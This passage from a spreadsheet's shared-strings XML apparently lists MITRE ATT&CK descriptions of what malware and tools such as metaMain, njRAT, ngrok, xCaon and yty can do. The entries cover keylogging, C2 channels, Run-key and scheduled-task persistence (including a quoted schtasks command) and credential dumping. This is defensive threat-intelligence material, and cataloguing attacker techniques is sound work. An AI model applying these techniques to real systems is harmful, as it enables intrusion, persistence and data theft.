  </si>
  <si>
    <t>relationship--ae2aeca3-098f-42f2-a35e-e0d206ba84f7</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) has deleted collected items after uploading the content to its C2 server.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--c3c78b2e-a53e-4020-8fba-6e63c73e0b76</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) can recursively enumerate files in an operator-provided directory.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--ac0de65d-dc44-4575-a175-167e9c85cde9</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) can download files onto compromised systems.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--bd2c2f6f-5bc1-4150-b618-3b53b037670f</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) can log mouse events.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--69d4f4f9-adb0-41fc-952d-88579ab5b46b</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) can create a named pipe to listen for and send data to a named pipe-based C2 server.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--af9720b7-fef3-4b8d-b2ad-073355523866</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) has the ability to log keyboard events.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--e39aaec3-2473-4986-9278-eb1e880d127d</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) has stored the collected system files in a working directory.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--4126e124-fb28-4274-a687-dc5344b34859</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) can write the process ID of a target process into the `HKEY_LOCAL_MACHINE\SOFTWARE\DDE\tpid` Registry value as part of its reflective loading activity.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--51b34c1f-4e2f-4bb7-98a1-fa90ed873eba</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) can execute an operator-provided Windows command by leveraging functions such as `WinExec`, `WriteFile`, and `ReadFile`.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--73675ce7-d059-424a-9f8f-683188b19017</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) can establish an indirect and raw TCP socket-based connection to the C2 server.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--45ef2a23-61b6-4f78-9d86-58a2d50a4ee0</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059)'s module file has been encrypted via XOR.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--2a82c4cf-5c04-41b9-bfa4-c5e00d288eed</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) has authenticated itself to a different implant, Cryshell, through a port knocking and handshake procedure.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--fbaf2482-7ab9-4feb-bb88-06646559d9ca</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) can enumerate the processes that run on the platform.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--387d5cbe-8862-45c1-9577-c1424b072283</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) can inject the loader file, Speech02.db, into a process.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--ed7582ee-c131-4525-8e69-26e9e5646328</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) has reflectively loaded a DLL to read, decrypt, and load an orchestrator file.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--507d0a52-450a-4bb9-8667-e787f8c589f2</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) can take and save screenshots.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--77c31f47-883a-4381-a70e-96bd5f1371d3</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) can encrypt the data that it sends and receives from the C2 server using an RC4 encryption algorithm.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--e4fa961c-e72b-47b3-b0fb-8051f9ca4d63</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) can collect the computer name from a compromised host.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--fcad9dc8-fa79-491e-91ec-35a2a9cd55e8</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) can collect the username from a compromised host.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--1dfbbbe3-c04d-4ad6-98bf-15a9cd84ab06</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) has delayed execution for five to six minutes during its persistence establishment process.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--a03c46d1-763a-40e8-952b-36b27be11dda</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) can change the `CreationTime`, `LastAccessTime`, and `LastWriteTime` file time attributes when executed with `SYSTEM` privileges.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--ecbe0204-b205-47d5-ba6a-ef5c29737eda</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) can use HTTP for C2 communications.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--9cff1625-8af8-4337-8e8e-a4c0606b6381</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) registered a WMI event subscription consumer called "hard_disk_stat" to establish persistence.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--46e81587-e960-4277-9c3b-af2bdc328176</t>
  </si>
  <si>
    <t>[nbtstat](https://attack.mitre.org/software/S0102) can be used to discover local NetBIOS domain names.</t>
  </si>
  <si>
    <t>relationship--92d3b6b0-7c61-452a-a9b9-c2549357bfef</t>
  </si>
  <si>
    <t>[nbtstat](https://attack.mitre.org/software/S0102) can be used to discover current NetBIOS sessions.</t>
  </si>
  <si>
    <t>relationship--980e4dca-4d6b-4206-9c51-bff32c72a961</t>
  </si>
  <si>
    <t>[netsh](https://attack.mitre.org/software/S0108) can be used to disable local firewall settings.(Citation: TechNet Netsh)(Citation: TechNet Netsh Firewall)</t>
  </si>
  <si>
    <t>relationship--512879fe-8433-4c78-9345-009ed5168078</t>
  </si>
  <si>
    <t>[netsh](https://attack.mitre.org/software/S0108) can be used as a persistence proxy technique to execute a helper DLL when netsh.exe is executed.(Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>relationship--581f8dd6-edd4-467b-a3d5-3177870b0264</t>
  </si>
  <si>
    <t>[netsh](https://attack.mitre.org/software/S0108) can be used to set up a proxy tunnel to allow remote host access to an infected host.(Citation: Securelist fileless attacks Feb 2017)</t>
  </si>
  <si>
    <t>relationship--69c1806d-e6ae-4c11-bce6-8fbebd8bbee5</t>
  </si>
  <si>
    <t>[netsh](https://attack.mitre.org/software/S0108) can be used to discover system firewall settings.(Citation: TechNet Netsh)(Citation: TechNet Netsh Firewall)</t>
  </si>
  <si>
    <t>relationship--f0d218a3-9f7b-4f21-aa4a-34dc25f05b61</t>
  </si>
  <si>
    <t>[netstat](https://attack.mitre.org/software/S0104) can be used to enumerate local network connections, including active TCP connections and other network statistics.(Citation: TechNet Netstat)</t>
  </si>
  <si>
    <t>relationship--28189361-4cd2-4925-a095-d7ebd07ebd57</t>
  </si>
  <si>
    <t>[ngrok](https://attack.mitre.org/software/S0508) can provide DGA for C2 servers through the use of random URL strings that change every 12 hours.(Citation: Zdnet Ngrok September 2018)</t>
  </si>
  <si>
    <t>relationship--aa962ede-f581-49c2-ade1-ed2eb91ed8ac</t>
  </si>
  <si>
    <t>[ngrok](https://attack.mitre.org/software/S0508) has been used by threat actors to configure servers for data exfiltration.(Citation: MalwareBytes Ngrok February 2020)</t>
  </si>
  <si>
    <t>relationship--8c273532-e27f-4424-a369-5373ce3652b9</t>
  </si>
  <si>
    <t>[ngrok](https://attack.mitre.org/software/S0508) can tunnel RDP and other services securely over internet connections.(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019)(Citation: MalwareBytes Ngrok February 2020)(Citation: Trend Micro Ngrok September 2020)</t>
  </si>
  <si>
    <t>relationship--ca56b2a6-39a7-4449-9017-fa8ce4285ed5</t>
  </si>
  <si>
    <t>[ngrok](https://attack.mitre.org/software/S0508) can be used to proxy connections to machines located behind NAT or firewalls.(Citation: MalwareBytes Ngrok February 2020)(Citation: Zdnet Ngrok September 2018)</t>
  </si>
  <si>
    <t>relationship--3e16f380-633b-4d27-9249-9bcf25717f5a</t>
  </si>
  <si>
    <t>[ngrok](https://attack.mitre.org/software/S0508) has been used by threat actors to proxy C2 connections to ngrok service subdomains.(Citation: Zdnet Ngrok September 2018)</t>
  </si>
  <si>
    <t>relationship--b110013b-35e5-470e-9e17-470c7071fa80</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) gathers information about opened windows during the initial infection.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>relationship--14a2bfd9-8be1-47f9-bced-b05ba2179eb5</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) is capable of manipulating and deleting registry keys, including those used for persistence.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>relationship--aeb4ffa0-24f7-4812-aa4d-553ac5e954de</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used AutoIt to compile the payload and main script into a single executable after delivery.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>relationship--7b17c352-f0b7-453d-9f80-e40b262ab8c7</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has a module that steals passwords saved in victim web browsers.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>relationship--07773227-54d9-4476-877a-739c490b7b65</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can collect data from a local system.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>relationship--fdaeae13-b9f2-4ae5-b4ae-c74fde73adcd</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has modified the Windows firewall to allow itself to communicate through the firewall.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>relationship--729d8ddd-b1e1-4076-b98c-3d5497dffd6e</t>
  </si>
  <si>
    <t xml:space="preserve">[njRAT](https://attack.mitre.org/software/S0385) has used HTTP to receive stolen information from the infected machine.(Citation: Trend Micro njRAT 2018)	</t>
  </si>
  <si>
    <t>relationship--b5f8197f-d703-461a-ba51-6e7749dd8367</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used a fast flux DNS for C2 IP resolution.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>relationship--e1bf83d4-90ce-4773-9b44-340c69e17de8</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) is capable of deleting files.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>relationship--4c7803e9-e099-4905-b32e-d46a09247e94</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can browse file systems using a file manager module.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>relationship--1daaea6e-527f-4c3d-9387-72ea68d7140d</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can download files to the victim’s machine.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>relationship--168ab4a2-db4d-4d64-9951-6547145aabe6</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) is capable of logging keystrokes.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>relationship--9e300a25-28f0-4373-939c-16d4d27577af</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can create, delete, or modify a specified Registry key or value.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>relationship--b2cf7d18-daa0-45a1-b2c1-6b6056bb19c4</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used the ShellExecute() function within a script.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>relationship--48879c97-651c-4426-9093-bd8c4939fc19</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used port 1177 for HTTP C2 communications.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>relationship--8131a5ed-f95f-406d-ae56-e5e10c8ced74</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has included a base64 encoded executable.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>relationship--72a10804-bc08-47a8-92ec-8e173b30705e</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</si>
  <si>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</si>
  <si>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relationship--30180ece-4504-4b6a-9182-5a2fbe3292df</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has executed PowerShell commands via auto-run registry key persistence.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>relationship--6809f70c-63a2-415d-8c64-66784fd80caf</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can search a list of running processes for Tr.exe.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>relationship--d46078a7-420b-4074-8ecb-3440737c12e4</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can read specific registry values.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>relationship--2bc482f0-f5ee-433c-81bd-566ef8a8d7a6</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has added persistence via the Registry key &lt;code&gt;HKCU\Software\Microsoft\CurrentVersion\Run\&lt;/code&gt; and dropped a shortcut in &lt;code&gt;%STARTUP%&lt;/code&gt;.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>relationship--85482d65-d2ac-4d79-8ee4-da653e73aa8f</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has a module for performing remote desktop access.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>relationship--89698142-6c48-465f-9e61-0146d0fa481a</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can identify remote hosts on connected networks.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>relationship--4b314d34-1e53-46a4-a3b8-131a19b256d6</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can be configured to spread via removable drives.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>relationship--815fff92-274f-467c-a8c0-a623588c6739</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can capture screenshots of the victim’s machines.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>relationship--36cdeef3-a216-44cd-ad79-dd8085e86fc3</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) uses Base64 encoding for C2 traffic.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>relationship--7ac39d41-f859-447e-947b-5da935d30894</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) enumerates the victim operating system and computer name during the initial infection.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>relationship--005cbf7d-9d0b-443b-91db-7b148a1eb55b</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) enumerates the current user during the initial infection.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>relationship--8519b4c1-55c5-46be-8bdb-aa2a6ee2cb1a</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can access the victim's webcam.(Citation: Fidelis njRAT June 2013)(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>relationship--30be2552-9794-4eef-b3b6-fa663f68784b</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used HTTP for C2 communications.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>relationship--a0188e1f-8048-4ade-a1f5-9a56d2fcc2b1</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can launch a command shell interface for executing commands.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>relationship--fada4b53-8916-406b-b042-bbf4185fe0d3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</si>
  <si>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</si>
  <si>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relationship--a6e4853a-78a6-4c88-a7c5-58793d3e4dcd</t>
  </si>
  <si>
    <t>[pngdowner](https://attack.mitre.org/software/S0067) deletes content from C2 communications that was saved to the user's temporary directory.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>relationship--7985b09e-9241-489c-a0f2-45a6f5c782f1</t>
  </si>
  <si>
    <t>[pngdowner](https://attack.mitre.org/software/S0067) uses HTTP for command and control.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>relationship--27afb647-85a1-4e89-8762-c6c7d04bc1c5</t>
  </si>
  <si>
    <t>[pwdump](https://attack.mitre.org/software/S0006) can be used to dump credentials from the SAM.(Citation: Wikipedia pwdump)</t>
  </si>
  <si>
    <t>relationship--57a1f1a8-f1c0-4b7c-b5b4-f283a278833c</t>
  </si>
  <si>
    <t>[route](https://attack.mitre.org/software/S0103) can be used to discover routing configuration information.</t>
  </si>
  <si>
    <t>relationship--c954a1f5-c925-4c5c-ad64-62545dfbe383</t>
  </si>
  <si>
    <t>[schtasks](https://attack.mitre.org/software/S0111) is used to schedule tasks on a Windows system to run at a specific date and time.(Citation: TechNet Schtasks)</t>
  </si>
  <si>
    <t>relationship--eeeac3c6-78d1-4506-a9a9-2518d0c6e500</t>
  </si>
  <si>
    <t>[spwebmember](https://attack.mitre.org/software/S0227) is used to enumerate and dump information from Microsoft SharePoint.(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>relationship--6a0748a1-7629-4afb-b089-ae068608a964</t>
  </si>
  <si>
    <t>[sqlmap](https://attack.mitre.org/software/S0225) can be used to automate exploitation of SQL injection vulnerabilities.(Citation: sqlmap Introduction)</t>
  </si>
  <si>
    <t>relationship--547b575e-bc3c-488a-ae38-8bf6387b33f5</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</si>
  <si>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</si>
  <si>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relationship--1858731f-2e82-4704-acba-b8de57dcfc4f</t>
  </si>
  <si>
    <t>[xCaon](https://attack.mitre.org/software/S0653) has uploaded files from victims' machines.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--0a558f22-0139-43d9-869b-ee0e71ac237d</t>
  </si>
  <si>
    <t xml:space="preserve">[xCaon](https://attack.mitre.org/software/S0653) has decoded strings from the C2 server before executing commands.(Citation: Checkpoint IndigoZebra July 2021) </t>
  </si>
  <si>
    <t>relationship--f2034fc3-e721-42ce-be50-d58668c5da4b</t>
  </si>
  <si>
    <t>[xCaon](https://attack.mitre.org/software/S0653) has a command to download files to the victim's machine.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--ae7cd450-60bc-426b-92df-14d9d1be279b</t>
  </si>
  <si>
    <t xml:space="preserve">[xCaon](https://attack.mitre.org/software/S0653) has leveraged native OS function calls to retrieve  victim's network adapter's  information using GetAdapterInfo() API.(Citation: Checkpoint IndigoZebra July 2021) </t>
  </si>
  <si>
    <t>relationship--c9342b34-f936-4913-aaee-71fcc5347fd4</t>
  </si>
  <si>
    <t>[xCaon](https://attack.mitre.org/software/S0653) has checked for the existence of Kaspersky antivirus software on the system.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--8536d997-c81c-48c9-94e9-6ffea04e4a0f</t>
  </si>
  <si>
    <t>[xCaon](https://attack.mitre.org/software/S0653) has used Base64 to encode its C2 traffic.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--b732b424-4648-48a5-8ecc-a2d55fda04c6</t>
  </si>
  <si>
    <t xml:space="preserve">[xCaon](https://attack.mitre.org/software/S0653) has encrypted data sent to the C2 server using a XOR key.(Citation: Checkpoint IndigoZebra July 2021) </t>
  </si>
  <si>
    <t>relationship--aa56ecfa-9eaf-457c-b46c-0710a0c8ff7c</t>
  </si>
  <si>
    <t>[xCaon](https://attack.mitre.org/software/S0653) has used the GetAdaptersInfo() API call to get the victim's MAC address.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--7a6ed4b1-4f41-4db0-89bf-439e77022da5</t>
  </si>
  <si>
    <t xml:space="preserve">[xCaon](https://attack.mitre.org/software/S0653) has communicated with the C2 server by sending POST requests over HTTP.(Citation: Checkpoint IndigoZebra July 2021) </t>
  </si>
  <si>
    <t>relationship--0a6b2a04-b01a-45a6-a0da-221dcdcf1c51</t>
  </si>
  <si>
    <t>[xCaon](https://attack.mitre.org/software/S0653) has a command to start an interactive shell.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--bc531c11-f295-41cc-9de8-2adb201621b5</t>
  </si>
  <si>
    <t>[xCmd](https://attack.mitre.org/software/S0123) can be used to execute binaries on remote systems by creating and starting a service.(Citation: xCmd)</t>
  </si>
  <si>
    <t>relationship--3f416bd3-a06f-4ec2-8cf6-4a84e0611c63</t>
  </si>
  <si>
    <t>S0248</t>
  </si>
  <si>
    <t>yty</t>
  </si>
  <si>
    <t>malware--0817aaf2-afea-4c32-9285-4dcd1df5bf14</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) communicates to the C2 server by retrieving a Google Doc.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>relationship--234dc427-cce0-45d5-9971-02890aff608d</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) contains junk code in its binary, likely to confuse malware analysts.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>relationship--37533c33-9cc4-4707-8b30-d8be6aeaefc6</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) collects files with the following extensions: .ppt, .pptx, .pdf, .doc, .docx, .xls, .xlsx, .docm, .rtf, .inp, .xlsm, .csv, .odt, .pps, .vcf and sends them back to the C2 server.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>relationship--48eff76f-1f39-49e8-87c2-11607a8aeea3</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) gathers information on victim’s drives and has a plugin for document listing.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>relationship--0efc2bef-9227-4af2-b73b-bfa61a3073aa</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) uses a keylogger plugin to gather keystrokes.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>relationship--b2f180de-6c03-41cd-a6ed-a49ac674740b</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) gets an output of running processes using the &lt;code&gt;tasklist&lt;/code&gt; command.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>relationship--5caffa87-adbb-45e8-ba6b-dc61188471a7</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) uses the &lt;code&gt;net view&lt;/code&gt; command for discovery.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>relationship--3c021bb7-e96b-4a87-931b-d74f19ec8bcb</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) establishes persistence by creating a scheduled task with the command &lt;code&gt;SchTasks /Create /SC DAILY /TN BigData /TR “ + path_file + “/ST 09:30“&lt;/code&gt;.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>relationship--1ebc312e-68a4-4119-94c5-79897a5bf5b4</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) collects screenshots of the victim machine.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>relationship--b81d449d-9ebd-4fb8-a77a-bb6bca93581b</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) packs a plugin with UPX.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>relationship--cbb27eed-2e1c-4675-a077-28765060b349</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) has some basic anti-sandbox detection that tries to detect Virtual PC, Sandboxie, and VMware. (Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>relationship--4f644120-7b96-4234-b81a-3160b34bca87</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) gathers the computer name, the serial number of the main disk volume, CPU information, Microsoft Windows version, and runs the command &lt;code&gt;systeminfo&lt;/code&gt;.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>relationship--abf00a6a-7922-432c-95e0-6c44db2c20e3</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) runs &lt;code&gt;ipconfig /all&lt;/code&gt; and collects the domain name.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>relationship--f9841bd6-ec35-423f-8b47-3f215fda197a</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) collects the victim’s username.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>relationship--8732cda7-068e-439d-a25a-1b056363d1f7</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) has deleted itself after creating a service as well as deleted a temporary file when the system reboots.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--49c54595-7740-40c9-8f12-68d8fd70ce9d</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can browse the file system.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--4990cf9a-9041-45c6-9d31-232ddb770341</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can modify the Registry.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--9fbc10b3-f72e-4cc8-9e94-34c6404c3a1f</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) has used RDP for lateral movement.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--1d37f088-123f-41bb-9367-a1696dbfe895</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) has been copied over network shares to move laterally.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--1ec9706f-7faa-466d-afd0-97cc71714f7b</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) has used SchTasks for execution.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--38419f2f-51d2-47ed-9fd9-bba3712474cc</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can obtain the victim PC name and OS version.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--5f179b5c-497f-42da-bc32-360b6113122b</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can obtain the victim IP address.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--7558a855-25fc-47cb-84ef-680f337f7d6d</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can obtain the name of the logged-in user on the victim.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--bd62c9fa-b1d4-4fb9-a892-99703e1f794d</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can launch command-line shells.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--dbf985a6-4e02-4f1f-a323-3169e4c3c9e0</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) has established persistence by adding itself as a new service.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--38b1ad70-4d24-4f5c-ad62-e03f38b6752f</t>
  </si>
